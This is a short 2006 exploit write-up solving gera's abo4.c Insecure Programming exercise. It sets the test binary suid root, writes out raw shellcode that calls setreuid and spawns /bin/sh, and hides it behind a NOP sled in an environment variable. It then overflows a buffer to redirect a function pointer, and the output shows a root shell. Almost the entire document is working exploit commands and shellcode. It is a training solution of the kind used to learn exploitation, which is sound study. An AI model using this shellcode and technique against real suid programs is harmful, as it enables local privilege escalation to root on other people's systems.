/
| [exp-abo4.txt] Thu Mar 23 19:03:41 CET 2006
|
| abo4.c exploit - solution 1
| http://community.core-sdi.com/~gera/InsecureProgramming/abo4.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
\

NB: Because of system() that drops privileges i've used
    merged plt (*) and classic (**) technics.


(**) [Overwriting return address]
/
| Suid abo4 (testing) 
\
bunker@syn:~/abo4$ su
 Password:
 root@syn:/home/bunker/abo4# chown root.root abo4
 root@syn:/home/bunker/abo4# chmod +s abo4
 root@syn:/home/bunker/abo4# exit
  exit

/
| Put bytecode in file "bcode"
\
bunker@syn:~/abo4$ perl -e 'print "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
\x53\x89\xe1\xcd\x80"' > bcode

/
| Export BCODE env with NOPx100 + bcode
\
bunker@syn:~/abo4$ export BCODE=`perl -e 'print "\x90"x100'``cat bcode`

/
| Find $BCODE address (see exp-abo3.txt for getenvaddr.c)
\
bunker@syn:~/abo1$ ./getenvaddr BCODE
 BCODE is located at 0xbfffff1d

/
| (*) Procedure Linkage Table
\
bunker@syn:~/abo4$ readelf -a abo4 | grep fn
   126: 08049728     4 OBJECT  GLOBAL DEFAULT   22 fn

/
| Executes abo4, fill buffer with $BCODE address
\
bunker@syn:~/abo4$ ./abo4 `perl -e 'print "\x28\x97\x04\x08"x70'` `perl -e 
'print "\x1f\xff\xff\xbf"'` "FAKE"
 sh-3.1# id
 uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

/
| Boom! :D
\